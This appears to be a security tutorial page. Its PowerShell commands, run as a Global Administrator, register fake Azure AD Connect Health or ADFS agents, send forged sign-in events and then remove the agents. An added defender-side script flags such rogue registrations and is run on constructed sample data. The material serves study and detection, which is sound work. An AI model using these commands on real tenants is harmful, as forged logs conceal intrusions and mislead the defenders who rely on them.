Registering Fake Agents for Log Spoofing

We talked about spoofing AAD logon logs as an ADFS administrator in Spoofing Azure Sign-In Logs; now we'll see how it's possible to do the same as a Global Administrator on the AAD side.

As a Global Admin, we can register our own AAD Connect Health agent:

PS /home/otter> New-AADIntHybridHealthService -DisplayName "minions.onmicrosoft.com" -Signature "minions.onmicrosoft.com" -Type AdFederationService

or register a new ADFS server:

PS /home/otter> Register-AADIntHybridHealthServiceAgent -ServiceName AdFederationService-minions.onmicrosoft.com -MachineName "<something>" -MachineRole AdfsServer_2016

After this setup we are, once again, free to generate fake login events:

PS /home/otter> $events = @(
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter1@minions.com" -IPAddress "1.1.1.1" -NetworkLocationType Extranet
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter2@minions.com" -IPAddress "2.2.2.2" -NetworkLocationType Extranet
>> )
PS /home/otter> Send-AADIntHybridHealthServiceEvents -AgentInfo $agentInfo -Events $events -Verbose

To remove the fake agents we created, we can use:

PS /home/otter> Remove-AADIntHybridHealthService -ServiceName "<agent_service_name>"
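
A defender-side check for the registrations shown above, as an added example that is not part of the original page or of AADInternals: it flags AD FS health services whose signature is not in an approved inventory, that share a signature with another service, or that were created after a known baseline. The function name, the sample objects and the property names (taken to mirror `Get-AADIntHybridHealthServices` output) are assumptions.

```powershell
# Added example. Property names (serviceName, signature, type, createdDate) are
# assumed to mirror the objects returned by Get-AADIntHybridHealthServices.
function Find-UnexpectedHealthService {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [object[]] $Services,
        # Federation service names the organisation really operates
        [Parameter(Mandatory)] [string[]] $ApprovedSignatures,
        # Optional: date of the last known-good inventory
        [Nullable[datetime]] $Baseline
    )
    $adfs = @($Services | Where-Object { $_.type -eq 'AdFederationService' })
    # Signatures registered more than once (a second service imitating a real one)
    $dupes = @($adfs | Group-Object -Property signature |
               Where-Object { $_.Count -gt 1 } | ForEach-Object { $_.Name })
    foreach ($svc in $adfs) {
        $reasons = @()
        if ($ApprovedSignatures -notcontains $svc.signature) {
            $reasons += 'signature not in approved inventory'
        }
        if ($dupes -contains $svc.signature) {
            $reasons += 'signature registered more than once'
        }
        if ($null -ne $Baseline -and
            ([datetime]$svc.createdDate).ToUniversalTime() -gt $Baseline.ToUniversalTime()) {
            $reasons += 'created after baseline'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                ServiceName = $svc.serviceName
                Signature   = $svc.signature
                Created     = $svc.createdDate
                Reasons     = $reasons -join '; '
            }
        }
    }
}

# Constructed sample inventory (not real tenant data)
$sample = @(
    [pscustomobject]@{ serviceName = 'AdFederationService-sts.example.com'; signature = 'sts.example.com'
                       type = 'AdFederationService'; createdDate = '2020-03-01T09:00:00Z' }
    [pscustomobject]@{ serviceName = 'AdFederationService-minions.onmicrosoft.com'; signature = 'minions.onmicrosoft.com'
                       type = 'AdFederationService'; createdDate = '2024-05-02T11:30:00Z' }
)
Find-UnexpectedHealthService -Services $sample -ApprovedSignatures 'sts.example.com' -Baseline ([datetime]'2023-01-01')
```

With the constructed sample, only the `minions.onmicrosoft.com` service is reported, for both the unapproved signature and the creation date.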
